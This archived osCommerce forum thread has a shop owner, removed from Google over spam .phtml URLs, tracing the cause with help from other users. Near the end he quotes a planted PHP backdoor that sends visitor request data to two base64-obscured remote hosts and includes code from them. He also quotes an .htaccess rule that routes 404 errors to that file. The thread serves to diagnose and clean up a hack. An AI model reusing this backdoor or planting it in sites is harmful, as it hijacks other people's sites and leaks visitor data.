Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Removed by Google


luqi

Recommended Posts

Posted

I was removed from Google search rsults on the plea that my site had some urls showing in search results and they all end with phtml.I can assure you that i do not have any files ,urls ending with phtml but fact remains that when i search in Google with my site name(space) phtml and i find over 200 urls showing against my site ending with phtml.The most interesting thing is that before click it is my website url but after i click it lands on this page one live example is below.

http://find.uz/search.php?q=firesrus%20pht...;said=e&d=5

If you visit this page then you can understand that this is deceptive url in Google search results and is not found in my ftp or site at all though before click it was showing in google like.www.mysite.co.uk/catalog/1C.6.0.hasp.crack.phtml - 1k

I thought it could be virus so just bought Norton and downloaded my site and scanned all of it and found nothing.

I do not understand what is this and how to get rid of this.Google has removed me once and restored my site but out of 1500 urls now i can see about three hundred urls of my site including these phtml urls and it looks like that Google has restricted my site to show less results in view of this problem as these links are changing shape and quantity on daily bases.I have pasted Google's mail below but i have no clue what is my fault and what is wrong i am doing.These urls are not part of my site for which i am penalised.

Can any one please throw light on it that what is happening,is it website security issue or server or some other technique hackers are enjoying and making money out of pay per impression etc.In any case bottom line is that how can i get rid of this as this site is my living .

 

 

 

Dear site owner or webmaster of (mysite).co.uk/catalog,

 

 

While we were indexing your webpages, we detected that some of your pages were using techniques that are outside our quality guidelines, which can be found here: http://www.google.com/webmasters/guidelines.html. This appears to be because your site has been modified by a third party. Typically, the offending party gains access to an insecure directory that has open permissions. Many times, they will upload files or modify existing ones, which then show up as spam in our index.

 

 

The following are some example URLs from your site:

 

 

mysite.co.uk/catalog/red.hot.tv.hack.pin.phtml

 

www.mysite.co.uk/catalog/Play.Cue.Club.crack.phtml

 

mysite.co.uk/catalog/19629.phtml

 

 

In order to preserve the quality of our search engine, we have temporarily removed some of your webpages from our search results. Currently pages from firesrus.co.uk/catalog are scheduled to be removed for at least 30 days.

 

 

We would prefer to have your pages in Google's index. If you wish to be reincluded, please correct or remove all pages (may not be limited to the examples provided) that are outside our quality guidelines. One potential remedy is to contact your web host technical support for assistance. For more information about security for webmasters, see http://googlewebmastercentral.blogspot.com...webmasters.html.

 

 

When you are ready, please visit https://www.google.com/webmasters/tools/reinclusion?hl=en to learn more and submit your site for reconsideration.

 

 

Sincerely,

 

Google Search Quality Team

Posted

It isn't a virus, it's a hack (most likely) so an anti-virus program won't help. I only see 39 pages when I search google for your total listings and those are mostly invalid links. You need to search your files for ones that shouldn't be there. A common trick of hackers is to add code that redirects your pages to some other location so the actual file may not be on your server. If this turns out to be the problem, then you should install the SiteMonitor contribution so you will know if this happens again.

 

Jack

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Posted

Thanks for your help and i have very heavy loaded oscommerce site with may be hundred additional contributions added to store and above all i am not php expert so is there any way to check which is that file which is redirecting it.

 

I have recently installed site monitor contribution and for future it may help ,but how to get rid of this issue.

 

In my Google webmaster tools i see google getting hold of all these phtml pages as page can not be displayed pages and will eventually remove them but they keep adding by this trick /technique hackers have adopted.

 

It may be some freelancer (hacker) who has done it as i keep hiring them through freelancers website for small little jobs.

Posted

You could try using something like WinMerge to compare your local copy with the server one of your site.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Posted

Sam,

 

I can't find your site URL, but check your images folder, and all subfolders, for "bogus" PHP files. They usually have all numbers as names, like "212425.php".

 

There's a "hack" going around that plants these PHP files in your images folder, or any folder with "777" permissions.

 

Folder permissions should be no higher than "755".

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

As a layman i would like to have some guidance as it is not possible for me to go through each and every file and hackers being so clever will very rarely name a file like hackers98765432.php etc as i assume he will try his best to dodge by making very little change in file name from original file which could decive human eyes.

To cut the story short please give me your expert openion if it is possible for php programmer to search all site files with www in them.If this could be done then he can forward me all he found and then i could pin point the files having www or redirect which does not concern me or my site contents.

It will save lot of labour and waste of time and efforts provided it can be done.

I am sure a redirect would always take to www address and not to any other place or is there any technique to over ride this rule also.

Your reply with expert openion will be much appreciated please.

Posted

I don't know what they may use for a file name.

 

It could be they've added code to your existing file(s).

 

If you can download your sites files to your PC, I'm guessing the rogue code will look something like this:

 

base64_decode("YS5yc2RjcmFmdC53cw==")

There's a post around here I can link you to that gives various methods of searching your sites files for code like this (on a Windows PC) if you need.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

Yes please i have already downloaded complete site last night and now keen to know how can i find this code through window pc.Please let me know.

Posted

Click Me

 

I would just search for strings like this: base64_decode

 

At least at first.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

All above is very helpful sofar but searching base64_decode produces no results,some other keywords could help as i really do not know what all could be used in such codes to redirect a site.

 

Help appreciated please.

Posted

I suppose the next would be the most obvious: phtml

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

Sorry no results produced please.In google if you type firesrus phtml then you can see results and behaviour of such links and it may give you some idea as an expert.

Posted

I could guess all day long (which I won't) and still not get any results.

 

There are a million ways to "disguise" code.

 

I think you need to find someone who knows "rogue code" when they see it and give them access to examine the files on your site.

 

But that's just my opinion.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

You are infact right and i will try it but o just searched and could hardly find any experts or company who are in this kind of service.It looks like that it may be very difficult job to perform but anyhow i will continue and get back if some solution is found.It will help others atleast.

Kind regards for now and your help is much appreciated.

Posted

I did some searches, and none of the pages found exist anymore.

 

Its possible you`ve disgruntled some coder that put stuff on your site just to mess it up with google, but has now removed it just to mess weith your head.

 

I`ve seen this done before, sorry I can't help with the hows though.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Posted

But problem is that code inserted generates more of them and google keeps hunting them .This is going on for few months now.

Posted

Have you checked you`re site log to see if there are any regular accesses from elsewhere, could be you have a back door set up & code is being uploaded that way.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Posted

Hi Jim i think i have made little success but not sure as i have found one HTML document with the name of URLF and when opened it says as below.Since you mentioned base64_decode which is exactly as shown in document below.Please let me know what is this.

 

 

base64_decode PHP 3.0

 

string base64_decode(string str)

 

 

Decodes string using MIME base64 algorithm.

 

 

base64_encode PHP 3.0

 

string base64_encode(string str)

 

 

Encodes string using MIME base64 algorithm.

 

 

parse_url PHP 3.0

 

array parse_url(string url)

 

 

Parses a URL and returns its components.

 

 

rawurldecode PHP 3.0

 

string rawurldecode(string str)

 

 

Decodes a URL-encoded string.

 

 

urldecode PHP 3.0

 

string urldecode(string str)

 

 

Decodes URL-encoded string.

 

 

urlencode PHP 3.0

 

string urlencode(string str)

 

 

URL-encodes a string.

Posted

If that's all that's in it, it's not harmful.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

There are two more documents namely

Configuration\Content\Reference\PHP\Reference.xml

and

Configuration\CodeColoring\CodeColoring.xml

which have appeared in same search and dates are also same when modified.

These are very long files so i am not pasting them here but may be you recognise these files or do they look foreigners.

Posted

XML doc's aren't dangerous.

 

You need to look for files with PHP, PL or CGI extensions.

 

Most likely PHP

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

I have now got the idea that these urls are outcome of "page can not be displayed" and if you insert any url in google it scans and adds in google search results but when clicked then due to stream not completing it should give page can not be displayed but since in my site there is a command that instead of page can not be displyed show xyz search pages which benefits this hackers.

i have noticed a php file in my images folder and contents are below and i am pretty sure this is which is causing problem but just want to be certail before i kill it.please see contents below.

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

 

 

Also in my .htaccess file i could see it outside www and when opened found this.

 

Options -MultiViews

ErrorDocument 404 /catalog/images/create.php

 

it looks like some command.

 

Your help will be appreciated please.

Posted

Both of those are BAD!!!

 

Nuk'em!!!

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

Hi Jim

Thanks for your fast replies and contineous support as that really helped me to resolve this issue.

 

For all others who could face this problem the catch is that:-

 

Your 404 page is diverted to hackers adsense page where he benefits from pay per click etc.

 

How could he do it?

A hacker is not only a proper hacker but it could also be any unethical freelancer who is installing your module and you hired him for any small or big job.It could be hacker if your file permissions are below 775 as they can gain access.

 

The catch is that Google accepts thousands of pages like www.yoursite.com/xyz and google straight away accepts such links for search result pages against your site.

 

If you find in Google site:yoursite.com then you must find all listed pages which are also in your ftp and complete stream and also open on net.

 

In case of www.yoursite.com/xyz this page will though list in your site result which is google limitation and i have already notified them that they should only accept live links in site submission .

These dead links are not part of your site so they try to show page 404 but code inserted in your site diverts 404 page to hackers favorite page where he makes money.

 

I was surprised to see as who and from where these hundreds of pages are being inserted in Google against my site name and above was final outcome of all this exerscise.

Hacker has no job but he keeps adding dead links in google against sites he has hacked and keeps waiting for reward.

I hope it should be educational for others as i have tried to write in detail so even newbies could understand this trick.

 

Site monitor could save you from this trouble.

 

Thanks everyone for great help and i wish i could have left it here six months ago and could have avoided so much of business losses which i suffered due to removal from Google.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...